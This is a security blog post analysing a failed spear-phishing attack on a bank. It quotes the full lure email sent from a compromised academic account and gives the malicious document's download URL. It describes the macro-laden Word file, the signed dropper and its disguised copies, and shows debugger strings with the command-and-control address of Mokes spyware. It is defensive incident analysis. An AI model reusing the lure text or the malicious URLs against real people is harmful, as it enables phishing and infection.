## The APT Attempt

written by Mert SARICA | 3 April 2017 With each passing year, serious cyber security breaches are being experienced and institutions that learn from others' experiences have started to pay more attention to layered security architecture, to invest more in their employees for behavioral analysis, monitoring technologies, and the ability to detect and respond to advanced cyber attacks. Over the years, the failure of the classical security approach (antivirus, firewall, ips, etc.) to detect cyber attackers and prevent them has led organizations to collect (SIEM) records from more resources and to produce meaningful, valuable alarms (correlation) from them. Advanced cyber attacks (APT) that used to be read in threat reports have started to turn into a nightmare that institutions cannot wake up from.

As announced through written and visual media, Akbank announced a few months ago via the Public Disclosure Platform (KAP) that it had been subjected to a cyber attack. Although the development and outcome parts were different, HSBC Turkey had also shared with the public that it had experienced a cyber attack in 2014. Looking at it today, it is an undeniable fact that, like in the world, banks in our country (including those not reflected in the media) are faced with advanced cyber attacks, so in order to combat organized cyber crime organizations like Carbanak, Odinaff, who steal nearly \$1 billion from financial institutions with advanced cyber attacks, financial institutions, banks should continue their work and investments in technology, education, and human resources beyond regulations and security standards without slowing down.

Nowadays, if a bank is being hacked, it's highly unlikely that the perpetrators are a group of 3-5 amateurs just starting out, so it wouldn't be the right approach to trivialize such advanced cyber attacks with comments like, "Even my antivirus detects the harmful macro." However, just like in plane crashes, the fact that we encounter this situation as a result of a chain of mistakes is an important issue that needs to be carefully examined and lessons learned for everyone after every hacking case. With this article, I decided to help readers to evaluate and interpret a failed APT attempt.

This story begins with the assumption that an academic's email account at the London School of Economics was hacked. The malicious person attempts to carry

out a social engineering attack via email to a single person carefully selected from the target institution. To avoid arousing suspicion in the targeted person, one email is sent initially. The fact that the person sending the email is indeed an academic working at that university, that the email address (w.frost@lse.ac.uk) truly belongs to that person, that there is no suspicious attachment or link in the first sent email, and that the words are carefully chosen and the email is well-constructed, clearly reveals the motivation of the malicious person or people. In the last email sent by the malicious person, the targeted person is asked to download (http://moya.bus.miami.edu/~emil/Documents/Application\_Form.doc) and fill out a form. This email, which fails to reach the targeted person due to the precautions taken, triggers alarms in many systems, primarily the FireEye security system, starting the process of manual examination of the suspicious email by the corporate SOC team.

My name is , I work at the London School of Economics.

I am the head of the jury panel of contests organized by The Banker: http://www.thebanker.com/ Jury panel consists of representatives of several leading universities and also high-qualification experts from the financial corporations. Recently, one place in the expert group has become vacant. We are looking for a consultant that could help us to assess candidates for Islamic Bank of the Year Awards: http://www.thebanker.com/Awards/Islamic-Bank-of-the-Year-Awards They must have the experience in banking service and sufficient knowledge at the specifics of the region. It's great honor for me to invite you to join our team. Are you interested in participation? Best. The Banker Awards contest is held not the first time. Best scientists of the University College London, University of Miami School of Business Administration and other universities are the main experts. Jury panel is regularly updated. External advisor group consists of 20 people – there is one vacant place now. You will have to answer the set of questions regarding nominees of Islamic Bank of the Year Awards. It is essential for more precise assessment of candidates in each nomination. At the average, it may take about 2-3 hours a week. We provide flexible work hours and remote work opportunities In return, you will get the certificate of the honored contest expert, and prospect for further development in this direction. In next 3 weeks, we will need your assistance. If it goes well, we will proceed cooperation in 2017. What do you think? Best

Foremost, you have to fill out and send me the Expert application form: http://moya.bus.miami.edu/~emil/Documents/Application Form.doc

Further, I will prepare the NDA. After that, I will send you first questions.

Best,

When you download the Application\_Form.doc file and open it with Microsoft Office software, you encounter the warning message "Some active content has been disabled", but as in my article titled Microsoft Office Macro Analysis, you can't see any content related to the macro from the Macro menu (view -> macros -> view macros) because this malicious macro is included in the file as an ActiveMime object (OLE containing a macro compressed with zlib), as in the Dridex banking malware outbreak. Naturally, you are not surprised when you upload the Application\_Form.doc file to the VirusTotal site and no

## antivirus software can detect this file as malicious (0/53).

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As we often see in APT-focused cyber attacks, the fact that the teds.exe file is also digitally signed with a certificate that we believe belongs to a stolen company clearly shows that the malicious persons have resorted to this method in order to bypass the software performing application control. When you upload the teds.exe file to the VirusTotal site, this time you can see that 2 antivirus software detected this file as malicious software.

Certificate			
General	Details Certification Path		
	Certificate Information		
	<ul> <li>certificate is intended for the following purpose(s):</li> <li>Ensures software came from software publisher</li> <li>Protects software from alteration after publication</li> </ul>	re	
<u> </u>	fer to the certification authority's statement for details.		
	Issued to: LLC Agera Lab Issued by: GlobalSign Extended Validation CodeSigning CA - SHA256 - G3		
	Valid from 10. 10. 2016 to 11. 10. 2017		
Learn mo	Install Certificate Issuer Statement ore about certificates		
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← → C	https://www.virustotal.com/en/f	ile/bc2a840f254144c777f2db556123f1a7d81434618	c4c33bbf7fbe1f0e4c72b8c/analysis/1481387611/	\$
	希 Community Statis	tics Documentation FAQ About	Me English Join our community Sign in	
	<b>N</b> virus	total		
	SHA256: bc2a840	1254144c777f2db556123f1a7d81434618c4c33bbf7fbe1f0e4c7	2b8c	
	File name: teds.exe	1		
	Detection ratio: 2 / 56		🐸 0 🥶 0	
	Analysis date: 2016-12	-10 16:33:31 UTC ( 0 minutes ago )		
	Analysis Q File detail	Additional information     Comments     Q Votes		
	Antivirus	Result	Update	
	Invincea	virus.win32.parite.b	20161202	
	Symantec	Heur.AdvML.B	20161210	
	ALYac	0	20161210	
	AVG	۲	20161210	
	AVware	٢	20161210	
	Ad-Aware	0	20161210	

After being executed, the teds.exe, which is packed with UPX, copies itself under the name of mozillacache.exe, nacl32.exe, hpprint.exe, hpscan.exe skypehelper.exe, dropboxhelper.exe, acrobroker.exe to one of the Adobe, Mozilla/Firefox, Google/Chrome, Dropbox, Skype, Hewlett-Packard folders in the %APPDATA% directory, and then runs. As soon as it is executed, the first thing it does is to send a heartbeat message by making a request to http://91.121.120.198/v1, indicating a location in France.

🕷 x32dbg - File: nacl32.unpacked.exe - PID: FF4 - Mod	and the second second second	ced.exe - Thread: E90				
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All Modules (Strings)      Range: 00D7BC00-00D						
Address Disassembly			String			
0040070F mov dword ptr ds:[123FB98],eax 0040090F mov dword ptr ss:[esp],nac]32.uu	npacked.D9B000		"? +" "libgcc_s_dw2-1.	d]]"		
00400925 mov dword ptr ss:[esp],nacl32.ur 00400940 mov dword ptr ss:[esp+4],nacl32. 00400958 mov dword ptr ss:[esp+4],nacl32.	unpacked.D98000	13	"libgcc_s_dw2-1. "register_fram "deregister_fr	e_info"		
00400988 mov dword ptr ss:[esp+4],nacl32.u 004009A0 mov dword ptr ss:[esp+4],nacl32.	npacked.D9B041		"libgcj-16.dll"			
0040130F mov dword ptr ds:[123FB98],eax 0040150F mov dword ptr ss:[esp],nac132.ur			"_Jv_RegisterCla "? +" "libgcc_s_dw2-1.	d11"		
00401525 mov dword ptr ss:[esp],nacl32.ur 00401540 mov dword ptr ss:[esp+4],nacl32.ur	npacked.D9B000	13	"libgcc_s_dw2-1. "register_fram	dll" e_info"		
00401558 mov dword ptr ss:[esp+4],nacl32. 00401588 mov dword ptr ss:[esp],nacl32.ur	.unpacked.D9B02 npacked.D9B041	29	"deregister_fr "libgcj-16.dll"			
004015A0 mov dword ptr ss:[esp+4],nacl32 00401CE0 mov dword ptr ss:[esp+4],nacl32 00402FE7 mov dword ptr ss:[esp],nacl32.ur	unpacked.D9804	1F 30	"_Jv_RegisterCla "SetThreadErrorM "SkypeHelper"	ode"		
00402FE7 mov dword ptr ss:[esp],nacl32.ur 004030B2 mov dword ptr ss:[esp],nacl32.ur 004030CA mov dword ptr ss:[esp],nacl32.ur	npacked.D9B18C		"DropboxHelper" "bin"			
004031BB mov dword ptr ss:[esp],nacl32.ur	npacked.D9B19E		"nacl32" "Chrome"			
004031CF mov dword ptr ss:[esp],nacl32.ur 004032C0 mov dword ptr ss:[esp],nacl32.ur 004032D4 mov dword ptr ss:[esp],nacl32.ur	npacked.D9B1B9		"mozillacache" "Firefox"			
004033C5 mov dword ptr ss:[esp],nacl32.ur 004033D9 mov dword ptr ss:[esp],nacl32.ur	npacked.D9B1CC		"AcroBroker" "Acrobat"			
004034CA mov dword ptr ss:[esp],nacl32.ur 0040358D mov dword ptr ss:[esp],nacl32.ur	npacked.D9B1D4 npacked.D9B1DC		"hpprint" "hpscan" "http://91.121.1	20.108.6/18		
00404EF8 cmp edi,nacl32.unpacked.D9B644 00404FF5 mov dword ptr ss:[esp+4],nacl32. 004055F9 mov dword ptr ss:[esp],nacl32.un	.unpacked.D985AF	10	"/ccXXXXX.exe" "kkt"	20.198/11		
00405C24 mov dword ptr ss:[esp+1C],nacl3: 00405D3D cmp eax,nacl32.unpacked.D9B644	2.unpacked.D9B6		&"http://91.121.	120.198/v1" 20.198/v1"		
0040612C mov dword ptr ss:[esp],nacl32.ur 00406146 mov dword ptr ss:[esp+4],nacl32.	npacked.D9B700 .unpacked.D9B71	16	"http://91.121.1 L"urlmon.dll" "ObtainUserAgent	String"		
004062E0 mov dword ptr ss:[esp],nacl32.ur 00406ACD mov dword ptr ss:[esp],nacl32.ur	npacked.D9B72C npacked.D9B77F		"Mozilla/5.0 (co "Close"	mpatible; MSIE 10.0; Wi	ndows NT 6.1; WOW64;	Trident
00406AE1 mov dword ptr ss:[esp],nacl32.ur 00406C2E mov dword ptr ss:[esp],nacl32.ur 00407032 mov dword ptr ss:[esp],nacl32.ur	npacked.D9B790		"Connection" "Accept-Language	<b></b>		
00407032 mov dword ptr ss:[esp],nacl32.uu 00407312 mov edi,nacl32.unpacked.D9B7A5 0040732F mov eax,nacl32.unpacked.D9B7A0	npackeu.038/74		"User-Agent" "GET" "POST"			
004073A8 mov dword ptr ss:[esp+14],nacl32 004073B8 mov dword ptr ss:[esp+C],nacl32	.unpacked.D9B7A	19	&"*/*" "HTTP/1.1"			
00407507 mov dword ptr ss:[esp+4],nacl32 0040759D mov dword ptr ss:[esp+4],nacl32	.unpacked.D9B7B .unpacked.D9B7B	32 35	": " "\r\n"			-
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If you continue to research the character strings in the malicious software, you can quickly understand that this malicious software is a spy software named Mokes, which can record sound, image, and keystrokes, and targets Linux, Windows, macOS operating systems, discovered by Kaspersky at the beginning of 2016.

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In conclusion, those APT groups that you read about in threat reports from security companies like Kaspersky, and say "Wow, look what they've done, how did they do it..." while reading, may actually be targeting you and your institution. Before postponing your investments in security technologies, training, and human resources to the next year, it would be beneficial to think again, and again, and again.

Note: This article also contains the solution path for the "Pi Hediyem Var #10 cybersecurity game.">